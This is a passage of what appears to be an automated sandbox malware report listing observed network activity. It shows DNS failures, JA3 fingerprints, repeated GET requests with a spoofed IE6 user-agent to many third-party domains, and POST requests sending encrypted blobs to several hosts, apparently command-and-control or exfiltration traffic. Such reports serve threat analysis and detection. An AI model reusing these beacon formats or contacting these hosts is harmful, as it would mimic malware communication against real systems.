                      Source: unknownDNS traffic detected: query: actmin.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: someikan.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: clysma.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.koz1.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: workplus.hu replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: haigh-me.com replaycode: Name error (3)
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Joe Sandbox ViewIP Address: 104.26.7.17 104.26.7.17
                      Source: Joe Sandbox ViewIP Address: 104.24.161.27 104.24.161.27
                      Source: unknownNetwork traffic detected: DNS query count 435
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:58441 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:58451 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:58449 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.3:58456 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:58447 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 68 7a 63 76 4e 45 69 7a 65 70 53 63 37 4f 64 38 69 37 34 67 4c 4c 74 68 66 68 54 51 64 38 42 66 2f 48 4a 47 77 5a 6f 52 79 34 67 57 45 41 64 4a 59 32 49 68 48 54 74 4a 5a 48 2b 53 77 6e 4a 59 47 67 76 7a 76 75 49 70 46 44 7a 4a 36 69 32 6c 66 53 2f 42 6d 38 38 63 37 6a 4e 31 73 31 2f 72 52 64 52 79 48 36 4a 69 65 49 63 70 33 57 78 4c 34 34 31 67 44 42 4a 67 4e 47 36 46 58 70 56 59 6b 36 37 37 34 4e 58 54 46 51 55 36 6d 38 7a 53 79 6b 7a 70 37 37 38 51 2b 37 73 75 47 54 32 6a 4f 33 47 74 73 68 4c 72 42 75 6a 56 63 2b 54 31 33 4b 4c 30 76 63 5a 67 4d 64 79 70 4b 49 42 6e 6d 49 56 68 43 62 62 6b 42 5a 45 44 4a 7a 55 63 35 44 43 44 72 41 69 7a 39 67 6d 50 73 73 68 57 79 74 6f 47 76 56 32 48 35 4e 2b 59 2f 53 6c 54 69 69 47 36 6e 68 6b 4a 75 31 33 68 65 6e 33 67 65 75 4c 6b 56 53 36 65 4e 69 2b 6c 74 34 6c 4c 2b 6f 36 57 51 35 70 67 65 7a 6c 64 7a 65 74 52 53 6f 64 30 33 5a 2b 6f 74 70 43 79 68 2b 70 39 79 59 61 59 67 42 39 37 67 45 6d 43 50 2f 57 45 56 75 2b 78 54 51 4c 52 38 52 47 41 5a 72 35 6c 42 56 34 76 7a 65 37 42 71 51 2b 30 4f 44 59 58 32 4e 2f 59 64 6b 79 51 30 57 38 34 6e 67 64 2b 76 44 74 44 44 54 50 35 72 6f 49 2f 50 48 4b 59 75 6e 37 75 6e 71 4f 57 75 47 78 75 52 70 4f 47 46 69 39 53 36 71 72 75 55 7a 35 30 72 43 49 53 47 66 55 6e 77 6c 65 49 64 55 53 72 44 42 64 77 31 4d 71 49 37 59 44 6a 5a 61 35 39 55 57 34 63 7a 6b 55 57 38 6b 4b 4f 41 74 38 50 4b 4d 46 6f 66 42 59 55 70 72 33 45 5a 34 73 6c 4b 2f 33 70 4a 57 59 51 6b 79 4d 43 56 2f 4b 56 47 7a 36 59 58 4e 53 2f 2f 31 4d 73 4a 32 34 70 44 70 38 30 68 6a 4d 64 51 58 65 2b 6c 75 77 4c 52 62 35 4a 4c 42 30 30 57 56 76 61 74 39 38 33 58 43 57 54 Data Ascii: hzcvNEizepSc7Od8i74gLLthfhTQd8Bf/HJGwZoRy4gWEAdJY2IhHTtJZH+SwnJYGgvzvuIpFDzJ6i2lfS/Bm88c7jN1s1/rRdRyH6JieIcp3WxL441gDBJgNG6FXpVYk6774NXTFQU6m8zSykzp778Q+7suGT2jO3GtshLrBujVc+T13KL0vcZgMdypKIBnmIVhCbbkBZEDJzUc5DCDrAiz9gmPsshWytoGvV2H5N+Y/SlTiiG6nhkJu13hen3geuLkVS6eNi+lt4lL+o6WQ5pgezldzetRSod03Z+otpCyh+p9yYaYgB97gEmCP/WEVu+xTQLR8RGAZr5lBV4vze7BqQ+0ODYX2N/YdkyQ0W84ngd+vDtDDTP5roI/PHKYun7unqOWuGxuRpOGFi9S6qruUz50rCISGfUnwleIdUSrDBdw1MqI7YDjZa59UW4czkUW8kKOAt8PKMFofBYUpr3EZ4slK/3pJWYQkyMCV/KVGz6YXNS//1MsJ24pDp80hjMdQXe+luwLRb5JLB00WVvat983XCWT
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 67 6e 69 35 51 64 67 6a 65 35 51 6d 35 43 53 47 32 39 55 50 56 38 74 77 76 4d 79 67 4b 33 66 74 6a 43 77 6f 61 34 31 37 47 6e 56 45 67 31 54 58 4e 4a 59 55 33 75 55 5a 72 74 42 78 46 43 77 56 34 54 46 62 2f 49 6f 42 4c 43 51 4e 2b 41 37 71 5a 72 72 71 38 6c 54 55 6b 45 42 35 77 54 56 71 38 36 69 30 66 58 50 2f 6e 56 4d 61 54 46 59 63 72 56 2b 62 45 4a 4e 51 46 62 73 41 6c 35 6a 5a 6f 78 31 65 4a 6f 64 48 43 6f 68 34 4c 66 45 76 75 31 49 44 67 6d 68 64 67 49 51 38 56 79 4a 71 30 48 43 63 6e 70 71 66 32 53 6c 36 44 41 6f 79 47 55 6c 62 2f 4e 76 57 53 42 4b 75 36 66 55 71 77 62 2b 43 66 57 4b 6d 70 66 58 55 5a 30 35 36 77 49 2f 48 67 68 4e 6c 58 58 6e 59 54 31 31 6c 6f 51 65 46 53 77 71 4b 4c 58 6d 45 73 51 34 64 31 48 33 61 76 46 6f 47 39 77 68 65 71 38 34 4e 52 75 66 75 48 4a 57 4a 70 62 37 4a 77 33 37 65 6e 57 4f 4b 53 69 42 36 52 75 62 6e 33 52 69 5a 30 75 2b 7a 69 5a 66 63 69 39 59 34 74 34 44 76 6c 54 56 78 72 33 46 59 4b 52 4c 66 43 69 56 59 74 56 49 57 52 56 30 71 34 52 63 6f 71 73 65 75 66 2f 6a 77 5a 73 32 68 2f 4b 35 41 6d 51 79 4a 69 4d 5a 39 55 2f 4f 73 4b 71 73 76 41 5a 56 68 64 6e 47 4a 65 38 43 77 61 38 35 51 37 57 55 5a 2b 74 73 6b 36 54 6a 4b 64 67 38 70 61 4c 75 39 46 6b 6e 39 4f 6e 72 66 65 44 6d 37 76 34 38 47 41 6d 64 30 2b 4d 68 78 66 48 30 5a 54 36 32 76 77 36 54 4a 66 38 57 38 5a 30 6a 50 36 72 2b 45 6d 76 44 41 79 49 56 6f 47 4b 78 59 55 6d 54 41 73 39 51 44 33 6f 77 73 62 66 79 73 6f 77 4d 79 4e 6c 5a 78 57 57 77 59 6e 36 50 4b 63 73 35 48 63 64 38 45 50 48 58 58 68 49 47 70 4d 6a 61 4d 6c 5a 51 2b 6b 4a 36 75 54 65 36 64 57 56 59 2f 56 47 78 58 35 4c 35 75 44 41 79 55 58 72 2b 33 56 71 59 59 36 43 39 71 73 70 56 73 61 62 2b 45 5a 76 50 74 4c 5a 35 47 66 4a 36 2b 43 58 33 76 4d 4f 42 4b 6b 56 73 6e Data Ascii: gni5Qdgje5Qm5CSG29UPV8twvMygK3ftjCwoa417GnVEg1TXNJYU3uUZrtBxFCwV4TFb/IoBLCQN+A7qZrrq8lTUkEB5wTVq86i0fXP/nVMaTFYcrV+bEJNQFbsAl5jZox1eJodHCoh4LfEvu1IDgmhdgIQ8VyJq0HCcnpqf2Sl6DAoyGUlb/NvWSBKu6fUqwb+CfWKmpfXUZ056wI/HghNlXXnYT11loQeFSwqKLXmEsQ4d1H3avFoG9wheq84NRufuHJWJpb7Jw37enWOKSiB6Rubn3RiZ0u+ziZfci9Y4t4DvlTVxr3FYKRLfCiVYtVIWRV0q4Rcoqseuf/jwZs2h/K5AmQyJiMZ9U/OsKqsvAZVhdnGJe8Cwa85Q7WUZ+tsk6TjKdg8paLu9Fkn9OnrfeDm7v48GAmd0+MhxfH0ZT62vw6TJf8W8Z0jP6r+EmvDAyIVoGKxYUmTAs9QD3owsbfysowMyNlZxWWwYn6PKcs5Hcd8EPHXXhIGpMjaMlZQ+kJ6uTe6dWVY/VGxX5L5uDAyUXr+3VqYY6C9qspVsab+EZvPtLZ5GfJ6+CX3vMOBKkVsn
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 78 4a 56 47 52 56 39 42 65 35 54 43 53 68 71 50 76 68 38 45 52 65 68 32 39 47 30 31 30 53 36 6a 41 37 65 74 4f 65 63 78 68 68 62 58 48 31 58 32 4c 31 37 48 47 50 48 55 70 45 69 69 6a 68 38 4d 61 67 42 50 58 2b 32 6f 45 4a 6b 68 42 7a 46 38 73 6f 54 46 56 4d 49 48 78 30 79 57 78 69 31 7a 5a 31 73 71 64 65 64 4c 33 6b 36 39 36 55 75 65 66 6e 47 2b 53 53 42 54 4d 4e 34 66 6c 41 41 36 46 63 30 4e 65 30 64 49 53 34 62 4a 32 33 63 67 76 4b 6a 6b 4d 6c 4c 4d 57 4d 6e 44 2f 7a 37 31 74 69 67 31 4e 6d 77 78 66 2f 66 31 32 37 37 38 50 47 45 39 59 6a 59 53 38 63 58 66 4c 44 48 30 44 67 39 35 77 59 39 6b 62 4d 6b 51 69 50 63 70 41 49 64 4f 6c 64 2b 39 49 57 72 36 59 56 6b 66 66 6f 34 33 59 77 78 48 41 55 6d 63 6c 64 49 46 4d 6d 61 73 65 65 43 76 53 52 56 73 64 72 4b 75 36 68 50 7a 6b 5a 50 78 2f 30 45 4b 61 71 51 67 7a 45 66 77 6d 58 53 6a 64 53 42 71 61 41 6d 65 7a 53 71 32 48 34 63 52 46 52 7a 6b 6f 4d 6e 49 64 59 4b 50 73 35 53 6d 69 32 43 74 4c 48 74 50 74 77 66 6c 53 69 4a 77 47 53 52 79 54 6b 41 2b 52 4f 36 6c 57 4f 6d 4d 75 52 4b 4e 41 45 57 59 4e 64 75 6d 63 50 2f 65 7a 35 55 56 42 66 63 56 6a 2f 41 6c 5a 6c 30 4f 6a 7a 4b 51 52 4a 39 35 68 72 6f 39 4a 66 57 43 6e 55 56 4c 47 56 72 6f 32 4a 56 6e 41 43 74 70 47 39 55 45 62 4c 6d 59 6c 6c 4d 63 76 4b 70 4c 6a 2b 4f 4a 48 64 55 62 54 47 2b 6c 32 57 42 6d 43 50 59 68 30 52 56 72 6c 6b 6f 5a 2b 64 71 48 37 4a 59 6d 6d 32 41 77 33 43 49 72 5a 6f 72 63 68 47 36 41 36 4c 51 64 66 34 4c 76 5a 45 56 78 43 31 55 74 34 6f 31 6d 70 77 74 75 47 78 79 47 53 61 76 45 47 76 38 34 37 6b 6a 49 6a 53 72 4a 57 77 33 70 47 4d 34 78 4b 41 6c 57 7a 50 78 4d 54 35 6b 4c 42 69 42 72 77 39 50 36 54 6b 6a 7a 7a 70 4b 55 6e 66 4e 70 4c 33 56 69 2b 67 3d 3d Data Ascii: xJVGRV9Be5TCShqPvh8EReh29G010S6jA7etOecxhhbXH1X2L17HGPHUpEiijh8MagBPX+2oEJkhBzF8soTFVMIHx0yWxi1zZ1sqdedL3k696UuefnG+SSBTMN4flAA6Fc0Ne0dIS4bJ23cgvKjkMlLMWMnD/z71tig1Nmwxf/f12778PGE9YjYS8cXfLDH0Dg95wY9kbMkQiPcpAIdOld+9IWr6YVkffo43YwxHAUmcldIFMmaseeCvSRVsdrKu6hPzkZPx/0EKaqQgzEfwmXSjdSBqaAmezSq2H4cRFRzkoMnIdYKPs5Smi2CtLHtPtwflSiJwGSRyTkA+RO6lWOmMuRKNAEWYNdumcP/ez5UVBfcVj/AlZl0OjzKQRJ95hro9JfWCnUVLGVro2JVnACtpG9UEbLmYllMcvKpLj+OJHdUbTG+l2WBmCPYh0RVrlkoZ+dqH7JYmm2Aw3CIrZorchG6A6LQdf4LvZEVxC1Ut4o1mpwtuGxyGSavEGv847kjIjSrJWw3pGM4xKAlWzPxMT5kLBiBrw9P6TkjzzpKUnfNpL3Vi+g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 70 68 6b 64 51 63 55 65 65 35 53 73 79 70 4f 2b 37 41 45 76 31 6a 35 48 76 76 6d 54 2b 64 5a 39 79 53 65 57 56 57 65 67 57 6f 31 65 42 64 6b 69 72 51 57 51 5a 57 55 57 49 46 38 39 42 38 67 36 77 32 32 62 64 53 44 79 58 44 39 36 4b 7a 31 68 4a 48 62 6d 68 62 42 58 52 42 62 57 2f 6d 61 35 67 32 76 6b 68 77 4b 79 44 6f 62 69 78 54 51 33 4d 43 31 33 59 48 75 30 34 69 48 59 48 4e 76 6a 65 76 34 50 36 59 58 6e 35 48 6f 55 42 77 54 4d 65 2f 79 30 48 56 33 38 55 36 2f 30 52 44 65 58 64 79 56 4c 59 6b 52 62 35 79 41 6b 4f 63 30 45 35 4c 68 54 79 4a 39 4d 4f 79 2f 4e 4d 72 55 75 55 77 4e 6d 48 79 53 78 6b 36 39 4f 6d 62 48 4a 64 6b 70 36 32 48 46 6e 30 71 39 56 45 66 48 49 70 65 74 31 67 31 53 7a 2f 64 46 6d 41 75 56 49 47 78 6b 36 59 67 78 68 67 34 6a 2f 74 71 76 4c 79 59 74 35 4b 69 6c 2b 33 77 73 50 51 72 4d 35 6d 47 65 45 65 6c 45 58 64 6b 7a 6d 71 69 4f 58 38 67 47 71 63 37 72 41 58 78 49 6a 5a 78 47 2b 4c 67 73 6d 79 78 4f 49 73 67 47 37 49 33 6a 43 33 69 4f 49 35 72 50 43 33 42 4e 35 72 33 47 5a 73 45 56 49 41 63 71 74 44 36 59 75 4a 52 76 6a 62 77 6f 52 58 56 70 59 75 62 77 62 50 58 44 39 68 55 6a 7a 56 4b 63 74 56 45 69 6b 7a 46 59 73 53 33 33 44 56 30 69 4a 50 31 78 52 31 4b 6b 39 6e 47 4c 47 4b 2f 6e 69 6d 62 52 6d 45 49 65 6f 2b 63 72 31 38 64 73 50 31 76 35 2f 4f 34 50 6c 70 61 77 5a 75 64 61 41 56 5a 58 41 32 37 6f 6e 6c 72 2b 77 78 6c 41 73 69 63 35 51 52 44 6c 4e 38 4f 6d 4d 5a 6b 6d 45 35 4c 55 6f 74 4f 34 39 31 79 44 6e 39 52 74 30 6b 53 4b 52 68 34 68 53 72 4a 57 49 70 53 59 41 41 62 4f 73 52 59 4e 70 71 78 67 6e 39 45 78 43 41 63 57 43 47 77 31 57 38 7a 41 77 37 48 35 4c 6f 56 75 49 6a 4d 59 52 34 35 45 56 4b 67 3d 3d Data Ascii: phkdQcUee5SsypO+7AEv1j5HvvmT+dZ9ySeWVWegWo1eBdkirQWQZWUWIF89B8g6w22bdSDyXD96Kz1hJHbmhbBXRBbW/ma5g2vkhwKyDobixTQ3MC13YHu04iHYHNvjev4P6YXn5HoUBwTMe/y0HV38U6/0RDeXdyVLYkRb5yAkOc0E5LhTyJ9MOy/NMrUuUwNmHySxk69OmbHJdkp62HFn0q9VEfHIpet1g1Sz/dFmAuVIGxk6Ygxhg4j/tqvLyYt5Kil+3wsPQrM5mGeEelEXdkzmqiOX8gGqc7rAXxIjZxG+LgsmyxOIsgG7I3jC3iOI5rPC3BN5r3GZsEVIAcqtD6YuJRvjbwoRXVpYubwbPXD9hUjzVKctVEikzFYsS33DV0iJP1xR1Kk9nGLGK/nimbRmEIeo+cr18dsP1v5/O4PlpawZudaAVZXA27onlr+wxlAsic5QRDlN8OmMZkmE5LUotO491yDn9Rt0kSKRh4hSrJWIpSYAAbOsRYNpqxgn9ExCAcWCGw1W8zAw7H5LoVuIjMYR45EVKg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 69 67 4a 44 52 50 45 34 65 35 51 79 78 41 52 6d 45 4e 33 70 62 6b 70 65 31 37 41 76 37 58 63 4a 74 61 34 50 57 4d 2b 4f 6d 6a 63 78 4a 49 43 64 65 69 2b 45 67 44 46 2f 54 2f 50 46 66 4e 4b 58 53 4f 43 44 6c 77 72 4c 36 70 67 78 64 48 4e 50 56 6a 79 35 63 39 76 71 31 74 74 32 50 5a 35 52 71 38 76 47 37 59 78 46 34 50 4a 49 58 79 62 30 48 72 39 78 72 6e 5a 32 4f 53 6f 69 6c 72 33 67 72 61 62 47 35 62 31 42 48 32 30 34 77 33 45 67 4f 52 4b 48 36 52 44 38 49 36 73 49 45 77 76 6f 73 71 33 5a 6a 31 41 2f 33 79 43 4c 6e 35 61 2f 43 56 54 50 79 56 6f 2b 51 71 4a 58 41 5a 49 6a 76 6d 35 32 52 67 7a 7a 63 78 54 50 74 6c 52 75 41 4a 41 43 68 55 73 4b 70 2f 68 73 61 39 33 71 71 79 56 49 51 33 52 42 31 4d 53 75 4c 57 52 63 38 66 7a 7a 57 39 6d 43 71 67 56 79 74 58 4c 53 70 44 58 4b 61 64 30 4b 76 75 6a 31 37 70 7a 6d 2b 53 63 32 35 31 39 49 69 4b 43 57 59 47 36 6b 5a 48 6a 51 71 76 7a 68 49 63 45 34 4e 77 37 75 56 58 76 6c 34 79 62 59 58 4e 66 33 59 6a 72 46 75 42 52 6a 78 39 50 31 52 39 39 70 4e 6c 37 43 6c 4b 35 6e 33 4f 34 42 36 67 57 59 77 36 4f 31 6f 5a 53 4e 64 2b 55 6f 74 39 4a 62 68 68 65 34 49 47 6a 58 51 4b 74 75 4d 39 4f 5a 2b 42 49 64 51 32 37 73 6a 6b 7a 42 2b 41 2f 69 59 78 55 72 57 71 51 55 6d 37 75 4f 54 72 49 50 42 55 52 45 76 45 2b 77 2b 35 66 30 32 4c 2f 2b 56 47 54 4e 4c 59 6d 74 37 43 54 63 6a 55 69 58 6a 68 35 79 30 64 63 79 43 4c 32 46 74 68 4d 30 58 74 4c 68 4a 6e 4c 74 34 72 33 2f 6e 49 47 34 43 48 71 30 47 73 32 4e 50 6f 67 45 51 69 63 36 39 71 75 73 74 4a 74 57 66 64 55 46 63 5a 6c 50 67 6d 79 4e 51 4c 71 59 76 58 69 37 6e 61 48 38 4b 5a 52 7a 64 50 33 62 76 52 37 64 74 74 43 56 43 63 35 72 35 6b 6a 6d 79 56 57 52 52 6d 77 32 64 47 79 4e 44 68 44 47 4f 2f 70 71 4a 42 4e 47 73 67 3d 3d Data Ascii: igJDRPE4e5QyxARmEN3pbkpe17Av7XcJta4PWM+OmjcxJICdei+EgDF/T/PFfNKXSOCDlwrL6pgxdHNPVjy5c9vq1tt2PZ5Rq8vG7YxF4PJIXyb0Hr9xrnZ2OSoilr3grabG5b1BH204w3EgORKH6RD8I6sIEwvosq3Zj1A/3yCLn5a/CVTPyVo+QqJXAZIjvm52RgzzcxTPtlRuAJAChUsKp/hsa93qqyVIQ3RB1MSuLWRc8fzzW9mCqgVytXLSpDXKad0Kvuj17pzm+Sc2519IiKCWYG6kZHjQqvzhIcE4Nw7uVXvl4ybYXNf3YjrFuBRjx9P1R99pNl7ClK5n3O4B6gWYw6O1oZSNd+Uot9Jbhhe4IGjXQKtuM9OZ+BIdQ27sjkzB+A/iYxUrWqQUm7uOTrIPBUREvE+w+5f02L/+VGTNLYmt7CTcjUiXjh5y0dcyCL2FthM0XtLhJnLt4r3/nIG4CHq0Gs2NPogEQic69qustJtWfdUFcZlPgmyNQLqYvXi7naH8KZRzdP3bvR7dttCVCc5r5kjmyVWRRmw2dGyNDhDGO/pqJBNGsg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 68 7a 63 76 4e 45 69 7a 65 70 53 63 37 4f 64 38 69 37 34 67 4c 4c 74 68 66 68 54 51 64 38 42 66 2f 48 4a 47 77 5a 6f 52 79 34 67 57 45 41 64 4a 59 32 49 68 48 54 74 4a 5a 48 2b 53 77 6e 4a 59 47 67 76 7a 76 75 49 70 46 44 7a 4a 36 69 32 6c 66 53 2f 42 6d 38 38 63 37 6a 4e 31 73 31 2f 72 52 64 52 79 48 36 4a 69 65 49 63 70 33 57 78 4c 34 34 31 67 44 42 4a 67 4e 47 36 46 58 70 56 59 6b 36 37 37 34 4e 58 54 46 51 55 36 6d 38 7a 53 79 6b 7a 70 37 37 38 51 2b 37 73 75 47 54 32 6a 4f 33 47 74 73 68 4c 72 42 75 6a 56 63 2b 54 31 33 4b 4c 30 76 63 5a 67 4d 64 79 